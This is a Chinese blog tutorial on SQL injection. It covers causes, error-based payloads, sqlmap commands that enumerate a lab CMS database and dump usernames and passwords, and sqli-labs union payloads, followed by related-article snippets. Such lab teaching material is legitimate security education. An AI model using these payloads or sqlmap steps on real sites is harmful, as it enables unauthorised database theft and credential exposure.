Web攻防第 02 讲:SQL注入

最新推荐文章于 2023-09-11 16:59:29 发布
最新推荐文章于 2023-09-11 16:59:29 发布
阅读量480 收藏 1
点赞数 1
分类专栏: Web攻防 文章标签: sql 前端 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qzc70919700/article/details/122263293
版权

一、造成SQL注入的原因

  1. 程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造SQL语句
  2. 为对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中

二、注入点可能存在的位置

  1. GET数据
  2. POST数据
  3. Cookie数据
  4. HTTP头部(HTTP请求报文其他字段)

三、SQL注入存在的危害

      攻击者利用SQL注入漏洞,可以获取数据库中的多种信息(例如:管理员后台的密码),从而脱取数据库中的内容(俗称脱库)。

四、SQL注入四大基本手法

联合注入

报错注入

      在注入点的判断过程中,发现数据库中SQL语句的报错信息,会显示在页面中,因此可以进行报错注入。

报错注入的原理,就是在错误信息中执行SQL语句。出发报错的方式有很多,具体细节也不尽相同。建议直接背公式即可,以下为group by重复建冲突公式。

group by重复建冲突

?id=33 and (select 1 from (select count(*),concat((select version() from information_schema.tables limit 0,1),floor(rand()*2)x from information_schema.tables group by x)a)

布尔盲注

延时注入

堆叠查询(多语句查询)

五、口诀

是否有回显?                      联合查询

是否有报错?                      报错注入

是否有布尔类型状态?        布尔盲注

绝招                                    延时注入

六、全自动化注入

6.1、半自动化注入工具burp

6.2、全自动化注入工具sqlmap(kali)

参数描述:

-u:检测注入点

--dbs:列出所有数据库的名字

--current-db:列出当前数据库的名字

-D:指定一个数据库名字

--tables:列出表名,结合-D使用

-T:指定表名称

--columns:列出所有的字段名,结合-T,-D使用

-C:指定字段

--dump:列出字段内容

示例:

命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33"

命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" --dbs

命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" -D "cms" --tables

命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" -D "cms" -T "cms_users" --columns

命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" -D "cms" -T "cms_users" -C "username, password" --dump

6.3、sqli-lib

6.3.1、字符型注入

单引号

?id=1

?id=1' and 1=2 union select 1, version(), 3 --+

6.3.2、数字型注入

?id=-2 union select 1,2 database()

6.3.3、字符型注入

')

?id=2') and 1=2 union select 1,2 version() --+

Java秦老师
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebSQL注入攻击
weixin_43916678的博客
11-05 1580
SQL注入概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合到一起,使用谓词为UNION或UNION ALL。 联合查询的利用前提:页面有显示位 联合注入的过程:判断注入点、判断是整型还是字符型、判断查询列数、判断显示位、获取所有数据库名、获取数据库所有表名、获取字段名、获取字段中的数据 常规思路 判断是否存在注入. 字符型1’ and ‘
web安全攻防SQL注入漏洞
m0_65456462的博客
05-13 351
靶场地址:http://110.40,154.100:8000/ 1.在浏览器中输入靶场地址 2.在地址后面输入admin进行用户验证 (进入后输入用户名admin,密码随便输入一个) 3.在kali中打开burpsuite 4.然后在浏览器中的设置(settings)中打开手动代理,进行抓包 5.将抓包完的内容发送到Intruder模式下的Positions,并点击Clear清除自动添加的变量,之后设置点击Add设置密码为变量名 6.然后到Intruder模...
简述各种SQL注入攻防.docx
05-07
简述各种SQL注入攻防. 1. 什么是输入 输入是编译时以外的全部数据交换。WEB应用程序从各种来源获取输入,例如所有用户发送的,或者应用程序运行的往返数据(用户提交的数据、视图状态、 cookie、查询字符串参数等),以及后台数据(数据库、配置数据和其他数据来源)。所有输入的数据都会在某种情况下影响请求的处理。 2. 输入验证的必要性 为什么输入验证如此重要?第一个原因非常明显:用户都不希望使用虚假的数据。应用程序会处理这些数据,根据它们得出结果,并最终存储到后台数据存储中 。网络上的其他应用程序有可能在某种情况下需要这些数据,这些程序可能依赖于数据的正确性。(如果这些数据没有经过验证,就有可能会带来麻烦。) 一切从外部获取的数据都可能是恶意的,如果缺少对数据的验证,将会带来很多安全问题。如EMAIL 验证、用户名验证等。如:缺少对EMAIL的长度验证,在存储 EMAIL时将出
SQL注入详解
热门推荐
行者AI
09-16 1万+
现在大多数系统都使用B/S架构,出于安全考虑需要过滤从页面传递过来的字符。通常,用户可以通过以下接口调用数据库的内容:URL地址栏、登陆界面、留言板、搜索框等。这往往会出现安全隐患,为了更好的保护数据泄露或服务器安全,为了方便的安全测试,便编写此文。 1. SQL注入简介 SQL注入就是指Web应用程序对用户输入数据的合理性没有进行判断,前端传入后端的参数是攻击者可控制的,并且根据参数带入数据库查询,攻击者可以通过构造不同的SQL语句来对数据库进行任意查询。下面以PHP语句为例作为展示: query="SE
sql注入详解1
Smile李先生
09-06 2720
sql注入   所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。[1]  比如先前的很多影视网站泄露V
sql注入
A_Alger的博客
08-25 176
sql原理 传入的参数拼接在数据库的查询语句中 导致一并进入到数据 sql注入有5种类型 Boolean-based blind SQL injection(布尔型注入) Error-based SQL injection(报错型注入) UNION query SQL injection(可联合查询注入) Stacked queries SQL injection(可多语句查询注入) Time-b...
Sql注入详解(原理篇)
Naive的博客
09-11 7175
SQL 注入漏洞非常复杂,区分各种数据库类型,提交方法,数据类型等注入,同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。SQL 注入就是指 Web 应用程序对用户输入的数据合法性没有过滤或者是判断,攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
攻防世界-web-supersqli
wuh2333的博客
06-07 908
我们看到,服务端默认的查询语句查询出两个字段,说明查询的是words表,我们将表1919810931114514的名字改成words并且将flag字段改为id字段不就行了吗?这里尝试按照基本思路进行验证,先确定注入点,然后通过union查询依次确认数据库名,表名,字段名,最终获取到我们想要的字段信息。博客里提到的一种预编译绕过的方式可以让我们绕过waf的限制使用select语句,处理起来较为复杂,这里就不详细说明了。使用 or 永真修改查询条件可以将所有信息查询出来,因此这里肯定是存在sql注入的。
SQL渗透与防御——(二)SQL注入
FisrtBqy的博客
02-27 4000
SQL注入
攻防世界 WEB-NewsCent(SQL注入
羽的博客
06-13 294
xian
Web应用程序中SQL注入攻防策略的研究.pdf
09-19
Web应用程序中SQL注入攻防策略的研究.pdf
Web应用的安全攻防SQL注入攻击(SQL Injection)
08-23
Web应用的安全攻防SQL注入攻击(SQL Injection)Web应用的安全攻防SQL注入攻击(SQL Injection)
T-SQL篇如何防止SQL注入的解决方法
01-19
1.什么是SQL注入 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为...
网络安全项目(XXS、SQL注入、dos)
06-16
本次实验要求在网络攻防实验环境中使用工具软件对给定的记录文件进行入侵检测,并对检测出的...通过SQL注入攻击、DOS攻击和XSS跨站脚本攻击,掌握网站的工作机制,认识到这几种攻击的防范措施,加强对Web攻击的防范。
基于Web应用的SQL注入攻击和防御技术研究_韩继英.pdf
10-25
基于Web应用的SQL注入攻击和防御技术研究_韩继英.pdf
攻防世界—-(web进阶)FlatScience–WP
12-14
打开题目: 发现都是pdf文件。看不懂 先来一套广播体操:我用的是御剑和AWVS 发现两个有趣的页面: ...(还有一个robots.txt, 打开之后也...在下面这句话里存在注入 参考网上的WP 查询字段: 构造查询密码的SQL:usr=' UNI
Sqli_Edited_Version.zip
02-12
SQLI-LABS是一个学习SQLI的平台,可用于在web安全攻防SQL注入中进行测试。但是由于新的php版本不兼容问题,原始的sqli会出现问题,这是热心网友修改过的版本,可以在新版本的php中使用。
hackbar.crx
10-30
SHA256: BDBB62321E51D310FA67453AD5EBF3D57EDCF5B2B2C47E6FA584757A66DBFAA9
dvwa sql注入impossible
最新发布
09-27
DVWA (Damn Vulnerable Web Application) 是一个用于练习网络安全的漏洞攻防平台。其中的SQL注入漏洞是一种常见的安全漏洞。然而,DVWA中的SQL注入漏洞实际上是针对新手和学习者设计的,容易利用但难以修复的漏洞。 首先,我们需要明确一点,DVWA中的SQL注入漏洞是故意添加的,目的是为了教育用户如何检测和利用这类漏洞。因此,它被称为"impossible"(不可能)仅仅是因为在修复漏洞方面没有提供相关的解决方法。 通常,在实际的网络应用中,SQL注入漏洞是可以修复的,开发人员可以采取一系列安全措施来预防这类漏洞的发生。这些措施包括但不限于使用参数化查询、输入验证和过滤、限制数据库用户的访问权限等。 然而,在DVWA中,该漏洞的目的是教育用户,使他们能够理解和熟悉SQL注入漏洞的原理和利用方式,以便在实际环境中能够更好地防范和应对这类攻击。 因此,尽管DVWA中的SQL注入漏洞被称为"impossible"(不可能),但在真实世界中,我们仍然需要意识到SQL注入漏洞的存在,掌握相关的防范和修复方法,以确保我们的网络应用的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值